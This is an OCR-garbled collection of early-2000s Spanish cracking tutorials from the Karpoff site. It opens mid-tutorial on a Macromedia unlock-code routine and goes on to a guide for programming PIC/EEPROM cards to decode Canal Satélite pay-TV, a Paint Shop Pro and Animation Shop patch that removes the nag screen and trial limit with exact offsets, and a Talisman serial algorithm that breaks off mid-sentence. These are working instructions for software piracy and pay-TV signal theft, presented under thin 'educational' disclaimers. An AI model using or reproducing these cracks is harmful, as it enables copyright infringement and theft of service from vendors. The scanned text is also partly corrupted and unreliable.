:100062A3 51 push ecx --> Guardala para luego. 

:100062A4 8B15F4FA0310 mov edx, dword ptr [1003FAFA4] --> Algo interesante. 
:100062AA 83C266 add edx, 00000066 --> Dirección de la Tabla N* 3, (ver más abajo). 
:100062AD 52 push edx --> A guardar. 

:100062AE 8D853CFFFFFF lea eax, dword ptr [ebp+FFEFFFF3C] --> PERSONAL CODE. 
:100062B4 50 push eax --> Guarda la dirección apuntada por edx en :10006275. 
:100062B5 E8C6710000 call 1000D480 --> A quí se genera el Serial 

:100062BA 83C40C add esp, 0000000C --> Con el retorno del call el Serial en EAX 
:100062BD 33F6 xor esi, esi 

:100062BF 89B538FFFFFF mov dword ptr [ebp+FFFFFF38], esi 

:100062C5 6854FC0310 push 1003FC54 

:100062CA 8D8D70FFFFFF lea ecx, dword ptr [ebp+FEFFFF70] 

:100062D0 51 push ecx 


Como puedes ver y comparar, si has leido mi ensayo anterior, nada nuevo bajo el sol, para cuando llegamos al call que 
genera el Serial nos marean un rato con el Personal Code y el Unlocking Code de aquí para alla. Bien, vamos a entrar 
en call 1000D480 para ver como se genera el Serial. 


Lo primero que vemos es que se cargan diversas tablas de caracteres, las puedes ver haciendo D EDI o D ESTI según 
convenga para las Tablas 1* y 2?, la Tabla N* 3 aparece al rato en el valor apuntado por ECX. Estas tablas son las 
siguientes: 


Tabla N* 1 ¡POYZMEROUA 
¡Tabla N* 2 |JIKLICBXZC 
Tabla N* 3 19513844nF83jdyejj5 o 


El Serial es básicamente una transformación del Personal Code utilizando los valores de las tablas de arriba mediante 
el siguiente código: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

|:1000D557(C) 

| 

:1000D4FF 8D340B lea esi, dword ptr [ebx+ecx] --> En ESTI dirección de la Tabla N” 1. 
:1000D502 33C0 xor eax, eax --> Se ponen a 0 EAX 

:1000D504 33D2 xor edx, edx --> y EDX. 

:1000D506 8A042E mov al, byte ptr [esi+ebp] --> En AL primer digito del Personal Code. 
:1000D509 8A16 mov dl, byte ptr [esi] --> En DL primer caracter de la Tabla N” 1. 
:1000D50B 33C2 xor eax, edx --> Se xorea EDX con EAX 

:1000D50D 33D2 xor edx, edx --> Se limpia EDX para 

:1000D50F 8A11 mov dl, byte ptr [ecx] --> poner en DL el primer caracter de la Tabla N” 3, 
:1000D511 BE19000000 mov esi, 00000019 --> Un valor fijo en ESI. 

:1000D516 33C2 xor eax, edx --> Lo xorea de nuevo. 

:1000D518 99 cdq --> Una conversión de word a double word para la siguiente división. 
:1000D519 F7FE idiv esi --> Divide EAX entre ESI, el cociente va a AX y el resto a DX. 
:1000D51B 8B74242C mov esi, dword ptr [esp+2C] --> Se mueve a ESTI el valor 0024353A. 
:1000D51F 33C0 xor eax, eax --> EAX a 0 de nuevo. 

:1000D521 8A040E mov al, byte ptr [esi+ecx] --> Mueve a AL el primer caracter de la Tabla N* 2. 
:1000D524 BE19000000 mov esi, 00000019 --> Se prepara para una nueva división. 
:1000D529 80C241 add dl, 41 --> Le suma 0x41h al resto obtenido anteriormente. 
:1000D52C 88140F mov byte ptr [edi+ecx], dl --> Valor provisional del Unlocking Code. 
:1000D52F 81E2FF000000 and edx, OO000OFF 

:1000D535 33C2 xor eax, edx --> Xorea el resto+41 con el valor de la Tabla N” 2. 
:1000D537 33D2 xor edx, edx --> EDX a 0 otra vez. 

:1000D539 8A11 mov dl, byte ptr [ecx] --> La 3” Tabla de nuevo a DL. 

:1000D53B 33C2 xor eax, edx --> Nuevo xoreo. 

:1000D53D 99 cdq --> Conversión. 

:1000D53E F7FE idiv esi --> División de nuevo 

:1000D540 80C241 add dl, 41--> Le suma 0x41h otra vez y ya tenemos el valor definitivo. 


:1000D543 80FA4F cmp dl, 4F --> Una comparación de control. 
:1000D546 7502 jne 1000D54A --> Salta.. 
:1000D548 B258 mov dl, 58 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:1000D546(C) 


:1000D54A 8B442430 mov eax, dword ptr [esp+30] --> Número de carateres del Serial (0x0Ah) 
:1000D54E 88140F mov byte ptr [edi+ecx], dl --> Valor definitivo del caracter del Serial. 
:1000D551 41 inc ecx -->Incrementa el valor para la Tabla 3”. 

:1000D552 48 dec eax --> EAX es el contador. 

:1000D553 89442430 mov dword ptr [esp+30], eax --> Guardalo para la siguiente vuelta. 
:1000D557 75A6 ¡ne 1000D4FF --> Vuelta al principio hasta que EAX sea 0. 

:1000D559 8B442434 mov eax, dword ptr [esp+34] --> ¡Alehop!, ya tenemos el Serial en EAX. 
:1000D55D SE pop edi --> Vamos 

:1000D55E SE pop esi --> recuperando 

:1000D55F 5D pop ebp --> valores... 

:1000D560 C6400A00 mov [eax+0A], 00 --> Matxaka a 0 el valor siguiente al Serial. 
:1000D564 5B pop ebx --> Recupera EBX. 

:1000D565 83C418 add esp, 00000018 --> Corrige la Pila y 

:1000D368 C3 ret --> nos vamos.... 


Ya tenemos nuestro Unlocking Code en EAX, ahora lo más facil seria salir de SoftICE y ponerlo en su sitio para 
desbloquear el programa, pero a mi me queda una duda, ¿Donde y como se hace la comparación entre el Serial bueno 
y el de prueba que hemos puesto?, teniendo el Serial bueno no es una cosa que preocupe mucho, pero creo que este 
ensayo no estaría completo sin aclarar esto. Así que preparate para ver un poco más de código. 


La cosa no tiene mucho misterio, veamos, acabamos de retornar del call y estamos aquí: 


:100062B5 ESC6710000 call 1000D480 --> Aquí se genera el Serial 

:100062BA 83C40C add esp, 0000000C --> Estamos aquí, tenemos el Serial en EAX. 
:100062BD 33F6 xor esi, esi 

:100062BF 89B538FFFFFF mov dword ptr [ebp+FFFFFF38], esi 

:100062C5 6854FC0310 push 1003FC54 --> Guarda nuestro Serial de prueba. 
:100062CA 8D8D70FFFFFF lea ecx, dword ptr [ebp+FFFFFF70] --> El Serial Bueno. 
:100062DO0 51 push ecx --> Guardalo. 


* Reference To: KERNEL32.IstrcmpiA, Ord:02FFh 


| 

:100062D1 FF15CC300210 Call dword ptr [100230CC] --> LLamada a la función del Kernel32. 
:100062D7 8BC8 mov ecx, eax --> Por aquí 

:100062D9 83CFFF or edi, FFFFFFFF --> no volveremos a pasar 

:100062DC 8975FC mov dword ptr [ebp-04], esi --> si el Serial 

:100062DF B86F0D0000 mov eax, 00000D6F --> no es bueno. 

:100062E4 898528EEFFFE mov dword ptr [ebp+FFFFEE28], eax --> Esto es el comienzo 

:100062EA 99 cdq --> de la rutinas de 

:100062EB F7F9 idiv ecx -->encriptación del Serial para su colocación en el 

:100062ED 898528EEFFFF mov dword ptr [ebp+FFFFEE28], eax --> archivo CAWindowsIrsagent.ini. 


Entramos en la llamada a Kernel32!IstrempiA, fijarse que en ECX esta la dirección con el Serial bueno, avanzamos 
con F8. De Kernel32!lstrempiA pasamos a Kernel32!ord_62 y de ahí a Kernel32!IsBadWritePtr, seguimos con FS 
hasta llegar a este código: 


:¡BFF7A74C mov esi, [ebp+10] --> El Serial bueno. 
:¡BFF7A74F mov edi, [ebp+18] --> El nuestro de prueba. 
:BFF7A752 cmp esi, eax --> Una comparación , EAX = 0 por 
¡BFF7A754 jz BFF7A259 --> lo que no saltamos. 
:BFF7A75A cmp edi, eax --> Otra. 

:¡BFF7A75C jz BFF7A259 --> Idem. 

:BFF7A762 text ebx, BFF7A77B --> EBX es 1. 

:BFF7A768 jz BFF7A77B --> Saltamos... 

:¡BFF7A76A push 000003EC 

:¡BFF7A76F call Kernel32!SetLastError 

:¡BFF7A774 xor eax, eax 

:BFF7A776 ¡mp BFF7B292 

:¡BFF7A77B mov eax, [ebp+10] --> Aquí, el Serial bueno en EAX. 


:BFF7A77E mov ecx, [ebp+18] --> El de prueba en ECX. 
:BFF7A781 mov al, [eax] --> Primer caracter del Serial a AL. 
:¡BFF7A783 cmp [ecx], al --> Lo compara con el nuestro. 
:BFF7A785 ¡nz BFF7A7E8 --> Nos manda al carajo... 
:¡BFF7A787 cmp byte ptr [esi], 00 

:BFF7A78A jz BFF7A7E8 

:¡BFF7A78C inc esi 

:BFF7A78D inc edi 


La primera comparación se hace entre AL y ECX, el código que sigue a este fragmento son todo comparaciones entre 
ESI y EDI, donde se compara a las claras, valor por valor, el Serial Bueno y el que hemos introducido, como puedes 
ver no se han partido mucho los cuernos pensando. 


Por supuesto creo que no hay que decir que una vez que estamos dentro de alguna función del Kernel,o de cualquier 
otra dentro del Sistema, vamos, de tocar y cambiar cosas nada de nada, si no sigues mi consejo los resultados pueden 
ser expectaculares. 


REGISTRANDO EL PROGRAMA 


Tenemos el código de desbloqueo que introducimos en su casilla correspondiente, nos vuelve a pedir otro código, 
metemos el mismo y la cosa funciona. En la ventana final, después de rellenar los datos con lo que te de la gana, pones 
el Número de Serie que comienza por UDV y que hemos conseguido del archivo serialization, espera a que Sales 
Agent haga un Update y desaparezca de tu disco duro. ¡Felicidades! ya tienes un nuevo programa de Macromedia by 
the face. 


CONCLUSION 


Demos la gracias a la gente de Macromedia por sus fabulosos regalos, por que eso si, el programa una vez 
desbloqueado es para quitarse el sombrero. También hay que agradecerles los buenos ratos que nos hacen pasar 
aprendiendo a como NO se debe proteger un programa de la calidad y el precio de este. Esto es extensivo a todas las 
versiones Tryout de sus programas. 


Bueno pues creo que esto es casi todo, si me dejo algo o necesitas alguna aclaración estoy en: arkanian Omailcity.com 


Saludos y hasta otra. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 
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INTRODUCCIÓN A LAS TARJETAS DE CANAL SATÉLITE 


| AUTOR: | XIRTAM | FECHA: | 23 104/2001 


INTRODUCCION 


En este tutorial vamos a ver todo lo que tenemos que saber 
para grabar nosotros mismos las tarjetas de Canal satélite 
digital; además desde donde comprar hasta como grabarla y 


con que herramientas. 


AL ATAKE 


Lo primero que debes hacer es conseguir una tarjeta, existen multitud de 
modelos pero nosotros vamos a usar la PICCARD. Para conseguirla búscate la vida 
por ahí o cómprala por internet yo por si acaso te pongo unas Cuantas 


direcciones donde las puedes conseguir: 


wwWw.virtualsat.net 


www.electronicasuiza.com 


En estas direcciones puedes conseguir todo lo que necesitas. 


¿Qué necesito? 


Bien lo que necesitas es la PICCARD en cuestión, un GRABADOR, de los que 
también existen multitud de modelos, nosotros usaremos el TE - 20 que tiene dos 
zócalos (que nos interesan) en los que se tienen que meter los chips 


manualmente y un cable serie para conectar el GRABADOR con el PC 


¿Qué es esto? 


Antes de nada una breve explicación; el chip más grande es el PIC (16F84) y el 
pequeño es la EPROM (24LC16B). El PIC es el que tiene la lista de canales... la 
EPROM es la que tiene el código con las keys para decodificar todos los 


Canales. 


¿Qué programas necesito? 


Solamente necesitas dos programas el "IC-Prog" y el "pic.exe" 


IC-Prog 0.9c - Prototype Programmer Al ES 
File Edit Settings Command View Help 


Address - Program Code 


Configuration 


0000: 3FFF 3FFF 
0008: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF  YVVVYVYVVVY 
0010: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF  YVVWWVYVVY 
0018: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF  YVVVYWVYYVY 
0020: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF YVVWYVYVVVY 
0028: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF  YVVVVWVYVYVY 
0030: 3FFF 3FFF 3FFF 3FEF 3FFF 3FEFF 3FFF 3FFF  YVVVVVYVVVY 
0038: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF YVVWWVYVVYVY 
0040: 3FFF 3FFF 3FFF 3FFF 3FFF 3FEFF 3FFF 3FFF  YVYVYVVYVVVY 
0048: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF  YVVWWVYVVY 
0050: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFEF  YVVVVVVVVY 
0058: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF  YVVWWWVVVV hA| 


Dscillator: 
RE 


Address - Eeprom Data 


Checksum 1D Yalue 


Config word : 3FFFh 


JDM Programmer on Com 2 Device: PIC 16F84 


File evice ICsettings 


Load' in 
Load'ex 
avebufBin 
SavebufHe 
1ewbuffer 
fibout 

xit 


http://www.bos. a E 
E-Mail: waklostbos.nl 


a Program by Willem Kloosterhuis empty 
16084 
Henk Schaer 
LPT1 


Este es el aspecto de los dos programas. 
¿Cómo grabo los chips? 


Veamos con el IC-Prog se pueden grabar los dos chips pero vamos a grabar solo 


el PIC, la EPROM la vamos a grabar con el programa "pic.exe". 


Veamos como se graba el PIC: 


Lo primero que tienes que hacer es seleccionar el dispositivo a grabar: 


..+1C-Prog 0.9c - Prototype Programmer 
File Edit | Settings Command View Help 


— Address - MLS 4Wwire Eeprom » Configuration 

Hardware F3 12C Eeprom » FEF. vv vere ON 
Harciware Check Flash E > FFF pllboldetated Y z z z y 2 z poa 
Options IM-Bus Eeprom » PIC 16F83 
Smartcard (Phoenix) M icrochip PIC » PIC 120508 PIC 16F8: 

3FFF 3FFE 3FFF 3FFF/  MiciowieEeptom » [pc 72c508a PIC 160622 

3FFF 3FEF 3FFF 3FFF [MEA >” PIC 120509 PIC 16F628 

3FFF 3FFF 3FFF 3FFF SPI uE > PIC 1205094, PIC 160715 

3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF PIC12CE518 PIC 16F873 

3FFF 3FEF 3FEF 3FEF 3FEF 3FFF 3FFEF PIMIOTER1A PIN 1RFA7A 


Ahora selecciona el archivo que quieres grabar: 


El ES 
[E anonricacionessssssssss || a] ¿2 e) EL) 


Jotros 
Pasantes 
viadigital 
EEP_Noáuto_ Astra Rá4JDAR_160301.hex 


Polac.2004eprábril hex 


Pic_6969 | 
IHXS files (*.hex,*.h8) 


L 


Y por último grábalo: 


Program Al 


Como se graba la EPROM: 


El método es similar, selecciona el dispositivo: 


*WHillem?s PicProg PicProgrammer*Hillem”s 
*26-3-99 1.02 fre 24C02 1.02 

«hllem's PicProg 24C04 

*26-3-99 1.02 fre 25C08 

*Millem's PicProg 24016 

*26-3-99 1.02 fre 24032 

«hllems PicProg 24065 m? PicProgrammer*d!illem?s 
*26-3-99 1.02 fre 16084 1.02 freeware!*x*26-3-99 1. 
AlMllems PicProg 16F34 1 Ñ PicProgrammer+>dHillem?s 
*26-3-99 1.02 fre 120508 =3-99 1 

*Wlhillem's PicProg llem?s 


411 1lem merdlillem?s PicProgrammerx*Willem”s 
Load: in relxx*26-3-99 1.02 freeware!**26-3-99 1 
LoadHex PicProgrammerz=dli1llem?s 
avebufBin' PIC_6969.HEX 
SavebufHe:  EEP_H0*1.HEXZ 
iewbuffer POLAC2”2.HEX 
bout 
x1t 
+11 1lem merx*llillem?s PicProgrammer**10illem?s 


Antes de grabar haz lo siguiente: 


En el menú OPTIONS elige Ludipipo y el puerto en el que tengas el cable e]: 
(COM1) 


*Nillem?s PicProgrammerx*lHillem?s PicProgrammer+d)illem”s 

*26-3-99 1.02 freeware!x**26-3-99 1.02 freeware!**26-3-99 1. enk Schaer 
Wlhillem?s PicProgrammer*«WHillem?s PicProgrammerx*)illem?s David Tait 0 
*26-3-99 1.02 freeware!**26-3-99 1.02 freeware!**26-3-99 1. David Tait 0 
«lhillem?s PicProgrammerx*lillem?s PicProgrammer**Hillem”s Lpt 
*26-3-99 1.02 freeware!**26-3-99 1.02 freeware!**26-3-99 1.  1pt 
lillem?s PicProgrammer*Hillem?s PicProgrammerxdlillem”s udiPipo 
*26-3-99 1.02 freeware!*x*26-3-99 1.02 freeware!**26-3-99 1. C0M1 
WAlillem?s PicProgrammer*Hillem?s PicProgrammerxWHillem?s C0H2 
*26-3-99 1.02 freeware!**26-3-99 1.02 freeware!**26-3-99 1.  C0M3 
Wlhillem?s PicProgrammer*Wlillem?s PicProgrammerxWlillem?s COH4 
*26-3-99 1.02 freeware!**26-3-99 1.02 freeware!**26-3-99 1. esthardware 
«lhillem?s PicProgrammer*Wlillem?s PicProgrammer**Hillem?s 

*26-3-99 1.02 freeware!*x*26-3-99 1.02 freeware 

«lillem?s PicProgrammer*Hillem?s PicProgramme 

*26-3-99 1.02 freeware!**26-3-99 1.02 freeware 

A is 

*26-3-99 1.02 freeware!**26-3-99 1.02 freeware 

*«lillem?s PicProgrammerx*dlillem?s PicProgramme 

*26-3-99 1.02 freeware!*x26-3-99 1.02 freeware 


Después de configurar el GRABADOR dale a Testhardware para haber si te lo 


detecta y finalmente grábalo: 


*Nillems PicProgrammer*«lillem?s PicProgrammer 
*26-3-99 1.02 freeware!**26-3-99 1.02 freeware! ead 
lhillem?s PicProgrammer*«WHillem?s PicProgrammer Program 


*26-3-99 1.02 freeware!**26-3-99 1.02 freeware! Co pare 
lillem?s PicProgrammer*«hHillem?s PicProgrammer EraseP € 
*26-3-99 1.02 freeware!**26-3-99 1.02 freeware! ustPic 
*NHillem”s PicProgrammersWi llem s FicPregramer Clear uffer 
*?26-3-99 | sewarelr26-3-99 | eu re 


*NOTA: Si te da error es porque este programa a veces da problemas al abrir el 
puerto. Para solucionarlo se puede abrir el IC-Prog y darle en el Menú a 
Command / Read all seguido vulve a darle a Testhardware y te pondrá un mensaje 


"Hardware Present" graba y ya está. 


EEN 


Notas Finales: 


Los programas puedes encontrarlos en la página de virtualsat en la 


sección software. 


Los chips tienen una hendidura que debe coincidir con la de los 


zócalos a la hora de grabar, sino se rompe el chip. 


16F84 24LC16B 


p <= Endidura 3 <= Endidura 
po 7] 


Zócalo Zócalo 


Lo que se expone en este manual está comprobado ya que se ha hecho 


basandose en la propia experiencia. 


Esta página no contiene enlaces a páginas 


3 


legal 


es ni 


ilícito, todo lo aquí expuesto es totalmente 


Saludos a EBUC 


legal 


de caracter 


ESTE TEXTO SE HA HECHO CON FINES EDUCATIVOS EN 
NINGÚN MOMENTO EL AUTOR NI EL DUEÑO DE LA 
PÁGINA SE RESPONSABILIZAN DEL USO INDEBIDO QUE 

SE HAGA DE LA INFORMACIÓN. 


Si teneis alguna duda o pregunta mandarme un Email si puedo os responderé. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


Programa: [Paint Shop Pro 7.0 y Animation Shop 3.0 Paint Paint Shop Pro 7.0 y Animation Shop 3.0 | Pro 7.0 y Animation Shop 3.0 


PROTECCION: Evaluación de 30 dias 
Objetivo: Límite de tiempo y nags-screen 


* HexEditor (Hacker's View o HexWorkShop 2.54) 
Herramientas: * SoftlCE 3.2x 


* KrackPE AS de nuMIT_or (KUT) ) 


INTRODUCCION 


Bueno creo que poco puedo decir de este magnifico programa que no sepais ya. Puede que sea uno de los mejores 
programa de retoque fotografico que exista, por eso debemos evaluarlo correctamente, ¿no os parece?. 


Bueno el sistema de protección es una nag cada vez que cargamos el programa, tanto el Paint Shop Pro (PSP) como 
el Animation Shop (AS), siempre nos aparece, y tambien tiene un tiempo de "retardo del programa" ya que no 
podemos pulsar el botón START hasta que no pasen unos segundos. 


Por último solo lo podemos evaluar durante 30 dias, lo cual, no sé ... 


AL ATAKE 


Empezamos quitando esas nags : 


Primero que quiero decir es que me perdonen los crackers más avanzados por lo que yo pueda 
decir aqui o por mi manera Casi " torpe " de cazar el nag. Y os lo voy a explicar: he 
probado unos bpx y nada de nada, entonces, porque no hacerlo a lo bestia, me explico, 
cargamos el loader del softice (si), y vamos traceando el PSP con F10 hasta encontrar alguna 
Call que cargue la nag, Cada vez que la encontremos le ponemos un bpx, traceamos despues 
dentro de ella hasta encontrar una rutina interesante o alguna call que cargue esa nag, y si 
es asi le ponemos otro bpx, y asi sucesivamente... 


Tras muchos bpx y tambien mucho tracear vemos sobre una call final se carga la nag 


PSP: esta Call es 00727CB7 E8E8C70E00 call 008144A4 


Bien, lo que tenemos que hacer ahora es ver que cosas interesantes pasan en esta llamada, y 
qué podemos hacer.Por eso nos metemos (con F8) en ella y podemos ver: 


727CB7 E8E8C70E00 
72"BCB 8B0D84DE9500 


call 008144A4 
mov eax, [eax+04] 


T127CC05 33FF xor edi,edi 

727CC9 1919 jnz 727CE4 ----Salta y nos lleva a la nag---- 
727CCB 8BC8 mov ecx, eax 

XXXXXX ret 

727CE4 empieza la rutina de la llamada a la nag. 

nota: 


perdonad que la ponga asi ya que por falta de tiempo y tb, porque mi ordenata se que un poco 
pillao no lo he " podio " poner como el siguiente fragmento. 


Podemos ver que justo el en pricipio de la cadena existe una comparación que nunca va poder 
ser igual y que despues hay un salto que siempre se da y se dirige hacia las rutinas que 


generan la nag. La cosa esta clara, 


¿no?, nopear este salto!. Con esto hacemos volcer al 


codigo de donde hemos sido llamados pero sin pasar por las rutinas de formación de la nag 
jeje. Muy bien, ahora nos que da el AS, pero es que su esquema es Casi el mismo:La call ha 


inspeccionar será: 


4F8B6D E87E780400 call 00 


5403F0 


Tras darle al F8 para ver lo que hay sale: 


:005403FE 648925000000 
:00540405 sl 


* Reference To: MFC42.Ordinal:0490, 


:00540406 E8BDB50400 
:0054040B 8B0D443D5F00 
:00540411 8B4004 
:00540414 85C9 
:00540416 7518 
:00540418 8BC8 
:0054041A E8D1BAECFF 
:0054041F 33C0 
:00540421 8B4C2404 
:00540425 64890D000000 
:0054042C 83C410 
:0054042F Cc3 


00 mov dword ptr fs:[00000000], esp 
push ecx 


Ord:0490h 


Call 0058B9C8 


mov 
mov 


ecx, dword ptr [005F3D44] 
eax, dword ptr [eax+04] 


test ecx, é€0x 


jne 
mov 


00540430-—-—->Salta y nos lleva a la nag<--- 
ecx, eax 


call 0040BEFO 


xor 
mov 
00 mov 
add 
ret 


eax, eax 
ecx, dword ptr [esp+04] 
dword ptr fs:[00000000], ecx 
esp, 00000010 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00540416(C) == Rutina de formación de la nag---=-=-=-=-=-=-=-=-= 


:00540430 A1483D5F00 
:00540435 85C0 
:00540437 7411 
:00540439 33C0 


mov eax, 
test eax, 


dword ptr [005F3D48] 


eax 


je 0054044A 


xor eax, 


eax 


Aqui se puede ver que tras varias instrucciones testea ecx,ecx , y despues hay un salto, 
éste siempre se produce y nos lleva a la nag, para evitarlo, pues a nopearlo tambien!!!. 


Bueno esta claro que a nosotros nos interesa estos dos saltos: 


=>727CC9 “7519 3jnz 00727 


CE4  ===-- 


--este es el del PSP. 


=>540416 jnz 00540430 — ------ este es el del AS. 


Debemos buscar el offset para cambiar los bytes que queremos, para ello una de dos: 
1.—-Desensamblamos y miramos dirección y el offset, con el wdasm, o: 


2.—Usamos el KrackPE de nuMIT_or, esta opción es la recomendable ya que PSP ocupa Casi 9 MB 
y el AS casi 3MB, por lo que la 1* opción puede ser lenta. 


Su forma de usarse es muy sencilla se elgien el prog. a estudiar se le introduce la 
diercción virtual y le damos a GET OFFSET para obtener el offset que nos interesa. 


Bueno madiante este programa ( gracias nuMIT_or ) obtenemos: 
1.-PSP===>327CC9h 
2.-AS===>140416h 


Cambiarlos ( jnz por jz , Oo por, nop ) y fuera nags. ;-) 


Seguimos, quitando el límite de tiempo: 


Bueno, colegas ya aqui parece que no tengo que decir nada más debido a que cuando quitamos 
esas nags, impidiendo que se ejecutena algunas rutinas, tambien eliminamos este límite de 
tiempo que nos daban, por lo que: 


Se puede dar por terminado este tutorial ! 
Nota 1: Este tutorial es para el estudio de las protecciones de los programas y no para uso 
lucrativo. 


Nota 2: Este tutorial se puede exponer en cualquier pagina dedicada a lo anterior 
mencionado, incluso cambiando de plantilla, pero, eso si :==>SE DEBE HACER REFERENCIA A SU 
AUTOR (o sea yo,kamui ) Y A SU PROPÓSITO, comprendido?? 


Nota 3: Para alguna consulta: kamui_flatinmail.com 


Bueno, hasta pronto, saludos al canal tcrackers del irc-hispano, al grupo de Tutoriales2000, 
a todos los que ma han ayudado, y a todos los crackers que escriben tutoriales, y a los que 
lo leen...Gracias. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 
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Programa . Lighttek Software Talisman v1.61 


Protección: Serial/ Number 

Descripción: Utilidad para el escritorio de Windows 95/98/NT 
Dificultad: Facililla 

Download: http: //www.lighttek.com/ 


Herramientas: Softl CE 


Cracker: MeGaBiTe 16/01/2001 


INTRODUCCION 


Extraído de la ayuda del propio programa. 


[Talisman es un escritorio alternativo para Windows 95/98/NT. Usando "Talisman", usted puede crear 
cualquier interface para su ordenador. "Talisman" oculta el escritorio estándar de Windows. En el 
espacio de trabajo de "Talisman" puede poner cualquier número de botones o de imágenes. Estos 
objetos pueden tener cualquier forma o cualquier dimensión. Todos los objetos pueden ejecutar 
programas externos o comandos internos del shell. El número de formas (pantallas) puede estar en 
el rango de 1 a 1000. Cualquier objeto del a pantalla puede configurarse para que cambie de una 
forma a otra. Todas las configuraciones y todas las imágenes se guardan en una base de datos. 
Usted puede crear muchos themes "Talisman" y usar los objetos con enlaces para que vayan de un 
theme a otro. Puede usar "Talisman" como su shell por defecto en lugar del Explorer de Windows. 
"Talisman" tiene sus propios procedimiento de arranque, su propia bandeja de sistema y su propio 
menú 'Inicio'.] 


AL ATAKE 


Bueno, pues con todo lo maravilloso que parece ser éste programa y con todo lo que hace, creo que se 
debería haber pensado un sistema de protección un poco más potente. La verdad es que más simple no 
puede ser. En realidad, una chorrada. El esquema en elemental: el usuario debe introducir un Name y un 
Code. El programa recoge el Name; en un bucle recorre los caracteres del Name de principio a fín y va 
sumando los valores ASCII; ésta suma se guarda en un registro del microprocesador; cuando el bucle finaliza 
se multiplica la suma con una constante y éste resultado se compara con el Code que hemos introducido: si 
son iguales el programa se registra; en caso contrario, muestra el típico mensaje de error. ¡¡¡Elemental!!! 


Bueno, pues nada; vamos a éllo. Arrancamos el programa. Veremos que en la bandeja del sistema tenemos 
un nuevo ícono. Hacemos click con el botón derecho del ratón en dicho ícono y seleccionamos la opción 
'About/Registration ...'. Veremos ésta pantalla: 


Lighttek Software alisman is Shareware. This means that 
Talisman sion 1.61 , e sofh ailable to 
uation 

re forupto 3 

decide to k 


cure Internet 


seereadme.bd) . 
Online Registration 


a: Enter your registration name 


Your name Your code 


Register! 


Unre 
Afterthese s , will be the lawéul 
Y, T A T T SM A N owner ofthe program e 
Program by Arkadiy Istomin 


Bien, ahora vamos a introducir "MeGaBiTe" como Registration Name y "1193046" como Code. Evidentemente 
nos dará un mensaje de error, tal como podemos ver aquí abajo: 


Lighttek Software 
“ersion 1.61 


e readme.bd) 


Online Registration 


ourregistration name 


Unreaistered con 


4% TALISMAN 


Program by Arkadiy Istomin 


Bien. Vamos a lanzar Soft! CE y poner algún breakpoint. Intenté en primer lugar poner un breakpoint en 
'getWindowTextA', sin ningún resultado; después lo intenté con 'getDlgltemTextA', sin ningún éxito tampoco. 
Bien, antes ésta situación sólo queda recurrir a una función API que nunca suele fallar 'hMemCpy'. Ponemos 
un breakpoint en dicha función ("BPX HMEMCPY") y pulsamos F5 para regresar a la pantalla de Registro de 
Talisman. Como ésta pantalla sigue mantiendo los valores que hemos introducido anteriormente en sus 
editBox, lo único que deberemos hacer es pulsar con el ratón sobre el botón 'Register!'. Una que hagamos 
ésto Softl CE hará break al inicio de la función 'hMemCpy'; deberemos pulsar tres veces la tecla F5 y depués 
pulsamos F12 doce veces hasta que lleguemos a la siguiente posición en el código del programa: 


0177:0047EF76 CALL 00421290 
0177:0047EF7B XOR ESI,ESI >Aterrizamos aquí 
0177:0047EF7D MOV EAX, [EBP-08] >Mueve el User Name a EAX 0177:0047EF80 CALL 00403C2C 
>Calcula la longitud del User Name >y la pone en EAX 
0177:0047EF85 TEST EAX,EAX >¿Se ha introducido algo como User 
>Name? 
0177:0047EF87 JLE 0047EF9C >Si no es así, salta 
0177:0047EF89 MOV EDX,00000001 >Inicializa contador 
0177:0047EF8E MOV ECX, [EBP-08] >Pone el User Name en ECX 0177:0047EF91 MOVZX ECX,BYTE PTR 
[EDX+ECX-01] >Pone el primer >carácter del 
>Registration Name 
>en ECX 
0177:0047EF96 ADD ESI,ECX >Sumatorio de todos los caracteres 
>del User Name 
0177:0047EF98 INC EDX >Incrementa contador 
0177:0047EF99 DEC EAX >Decrementa el contador de la 
>longitud del User Name 0177:0047EF9A JNZ 0047EF8E >¿Hemos 
llegado al final? Si no es >así, reiniciar el bucle 
0177:0047EF9C MOV [EBP-14],ESI >Pone el sumatorio en la dirección 


>apuntada por EBP-14; ésta 
>dirección mantenía nuestro Code 
>falso 
0177:0047EF9F FILD DWORD PTR [EBP-14] >Convierte el número entero 
>guardado en al dirección 
>apuntada por EBP-14 en un 
>número real y lo envia a la 


>pila 
0177:0047EFA2 CALL 0040296C  >Pone el sumatorio en EAX 0177:0047EFA7 IMUL EAX,EAX,00000309 
>Multiplica el sumatorio por >309 hexadecimal y guarda 
el >resultado en EAX 
0177:0047EFAD MOV ESI,EAX >Copia el resultado de la 


>multiplicación en ESI 
0177:0047EFAF CMP ESI, [EBP-04] >Compara ESI con el contenido de la 
>dirección apuntada por EBP-04, que 
>no es otro que nuestro Code falso 


0177:0047EFB2 JNZ 0047F077 >Si no son iguales salta 


Bien, como decíamos al inicio de éste tutorial, el esquema de protección no puede ser más simple. La rutina 
recoge una cadena, se inicia un bucle que recorre todos los caracteres de dicha cadena, se suman los 
números de órden de la tabla ASCII de cada uno de los caracteres de la cadena y se guardan en una variable 
(léase registro del microprocesador), posteriormente ésa suma se multiplica por una constante (en éste caso 
"309 hexadecimal"), y por último se compara el resultado de dicha multiplicación con el Code que hemos 
